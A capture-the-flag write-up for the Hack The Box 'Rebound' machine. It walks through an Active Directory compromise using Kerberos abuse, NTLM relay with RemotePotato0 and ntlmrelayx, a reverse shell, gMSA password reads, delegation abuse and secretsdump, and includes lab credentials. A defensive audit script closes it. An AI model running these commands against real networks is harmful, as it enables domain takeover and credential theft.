🏀Rebound - HTB
https://app.hackthebox.com/machines/Rebound
Foothold
Enumerating existing users

Use GetUserSPNs with the no-preauth user jjones to request service tickets for the SPN accounts.

The ldap_monitor user's hash was cracked:

ldap_monitor:1GR8t@$$4u
The machine gives the error KRB_AP_ERR_SKEW (Clock skew too great).
After some googling I found this:

Synchronize the local clock with the domain time, as Kerberos is time sensitive.
Creating a TGT




After reviewing BloodHound:
1- Add the 'oorend' user to the ServiceMgmt group
bloodyAD -u oorend -d rebound.htb -p '1GR8t@$$4u' --host 10.10.11.231 add groupMember 'CN=SERVICEMGMT,CN=USERS,DC=REBOUND,DC=HTB' "CN=oorend,CN=Users,DC=rebound,DC=htb"
2- Get FullControl (GenericAll) on the OU 'Service Users'
bloodyAD -u oorend -d rebound.htb -p '1GR8t@$$4u' --host 10.10.11.231 add genericAll 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' "CN=oorend,CN=Users,DC=rebound,DC=htb"
3- Update the winrm_svc password
bloodyAD -u oorend -p '1GR8t@$$4u' -d rebound.htb --host 10.10.11.231 set password winrm_svc Ask1askaskask
or, with rpcclient:
setuserinfo2 winrm_svc 23 Ask1askaskask

Root
First we need the user tbrady.
Exploit: RPC -> LDAP relay
https://github.com/antonioCoco/RemotePotato0
It abuses the DCOM activation service and triggers an NTLM authentication of any user currently logged on in the target machine. It is required that a privileged user is logged on the same machine (e.g. a Domain Admin user). Once the NTLM type1 is triggered we set up a cross-protocol relay server that receives the privileged type1 message and relays it to a third resource by unpacking the RPC protocol and packing the authentication over HTTP. On the receiving end you can set up a further relay node (e.g. ntlmrelayx) or relay directly to a privileged resource. RemotePotato0 also allows grabbing and stealing NTLMv2 hashes of every user logged on a machine.
So this is what to do:
1- Set up a socat listener
socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:9999
2- Set up a cross-protocol relay server (ntlmrelayx)
python3 ntlmrelayx.py -t ldap://10.10.11.231 --no-wcf-server --escalate-user winrm_svc
3- Execute RemotePotato.exe
.\RemotePotato.exe -m 2 -s 1 -r 10.10.14.15 -x 10.10.14.15 -p 9999

Cracked the captured NTLMv2 hash with hashcat -m 5600:
tbrady : 543BOMBOMBUNmanda
We can't get a shell with this user, but we can still use bloodyAD.
The user tbrady has the ability to read the gMSA password of the delegator$ gMSA.
The delegator$ gMSA has constrained delegation configured over the DC.

Retrieved hash (LM:NT):
aad3b435b51404eeaad3b435b51404ee:9b0ccb7d34c670b2a9c81c45bc8befc3
Getting a TGT for delegator$


Uploading RunasCs.exe
.\RunasCs.exe tbrady 543BOMBOMBUNmanda "cmd.exe /c whoami"
We are able to execute commands as the user tbrady, so let's upload a reverse shell and grant permissions on the folder:
icacls "C:\Users\winrm_svc\Documents" /grant:r "Everyone:(OI)(CI)F" /T
.\RunasCs.exe tbrady 543BOMBOMBUNmanda "C:\Users\winrm_svc\Documents\shell.exe"
Now from the tbrady shell we execute Rubeus S4U to impersonate administrator and get a ticket:
.\Rubeus.exe s4u /user:delegator$ /aes256:9861cac50c316fadde60e00ec4a3c63852afbe05443343cdb011be5f1d4ddc2b /domain:rebound.htb /impersonateuser:administrator /nowrap /ptt
The ticket is not yet imported, so we copy the <base64> blob and pass it to another command to import it:
.\Rubeus.exe ptt /ticket:<base64 ticket .........asdgb==>
Administrator TGT imported.

We can also take the base64 ticket, decode it and convert it so it can be imported locally.

Found out that /etc/hosts must contain:
10.10.11.231 dc01.rebound.htb dc01
Configuring Kerberos ticket delegation (RBCD) from the 'ldap_monitor' service principal to the 'delegator$' service principal using LDAPS:
python3 rbcd.py -aesKey 9861cac50c316fadde60e00ec4a3c63852afbe05443343cdb011be5f1d4ddc2b 'rebound.htb/delegator$' -delegate-to 'delegator$' -use-ldaps -debug -action write -delegate-from ldap_monitor
Get an ldap_monitor TGT.
Now impersonate dc01$:
python3 getST.py -spn "browser/dc01.rebound.htb" -impersonate "dc01$" "rebound.htb/ldap_monitor" -k -no-pass
Export the new TGT (KRB5CCNAME) and dump the administrator's secrets with it:
python3 secretsdump.py -no-pass -k dc01.rebound.htb -just-dc-user administrator
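As an added defensive example (not part of this writeup), the Python below audits a resolved AD snapshot for the two conditions used in the root chain: the gMSA-password-read plus constrained-delegation path from the tbrady section, and the RBCD entry that the rbcd.py write leaves on delegator$. The snapshot is constructed, and it assumes the two security-descriptor attributes have already been resolved to trustee sAMAccountNames (as a BloodHound collector would do).

```python
"""Audit an AD snapshot for (1) non-privileged principals able to read the
password of a gMSA that has constrained delegation to a DC service, and
(2) RBCD grants (msDS-AllowedToActOnBehalfOfOtherIdentity) to non-privileged
principals. Assumption: SD-valued attributes are pre-resolved to trustee names."""

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}
DC_HOSTS = {"dc01.rebound.htb"}

SNAPSHOT = [  # constructed sample data, not a real LDAP dump
    {"sam": "tbrady", "memberOf": ["Domain Users"]},
    {"sam": "ldap_monitor", "memberOf": ["Domain Users"]},
    {"sam": "delegator$", "objectClass": ["msDS-GroupManagedServiceAccount"],
     "msDS-GroupMSAMembership": ["tbrady"],
     "msDS-AllowedToDelegateTo": ["http/dc01.rebound.htb"],
     "msDS-AllowedToActOnBehalfOfOtherIdentity": ["ldap_monitor"]},
    {"sam": "dc01$", "objectClass": ["computer"], "memberOf": ["Domain Controllers"]},
]

def spn_host(spn: str) -> str:
    """'http/dc01.rebound.htb:8080' -> 'dc01.rebound.htb'."""
    return spn.split("/", 1)[-1].split(":")[0].lower()

def is_privileged(obj: dict) -> bool:
    return bool(PRIVILEGED_GROUPS & set(obj.get("memberOf", [])))

def dc_delegation_targets(obj: dict, dc_hosts=DC_HOSTS) -> list:
    """SPNs in msDS-AllowedToDelegateTo whose host is a domain controller."""
    return [s for s in obj.get("msDS-AllowedToDelegateTo", []) if spn_host(s) in dc_hosts]

def find_gmsa_paths(snapshot, dc_hosts=DC_HOSTS):
    """(reader, gmsa, spn) triples: who can read a DC-delegating gMSA's password."""
    by_sam = {o["sam"]: o for o in snapshot}
    findings = []
    for o in snapshot:
        if "msDS-GroupManagedServiceAccount" not in o.get("objectClass", []):
            continue
        for spn in dc_delegation_targets(o, dc_hosts):
            for reader in o.get("msDS-GroupMSAMembership", []):
                if not is_privileged(by_sam.get(reader, {})):
                    findings.append((reader, o["sam"], spn))
    return findings

def find_rbcd_grants(snapshot):
    """(trustee, account) pairs where a non-privileged trustee may act on behalf of account."""
    by_sam = {o["sam"]: o for o in snapshot}
    return [(t, o["sam"]) for o in snapshot
            for t in o.get("msDS-AllowedToActOnBehalfOfOtherIdentity", [])
            if not is_privileged(by_sam.get(t, {}))]

if __name__ == "__main__":
    for reader, gmsa, spn in find_gmsa_paths(SNAPSHOT):
        print(f"[!] {reader} can read gMSA {gmsa}, which delegates to {spn}")
    for trustee, acct in find_rbcd_grants(SNAPSHOT):
        print(f"[!] RBCD: {trustee} may act on behalf of {acct}")
```

Run against a real export, either finding is an alert: the first is the misconfiguration that made tbrady valuable, the second is the artifact the rbcd.py write leaves behind and should be removed.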
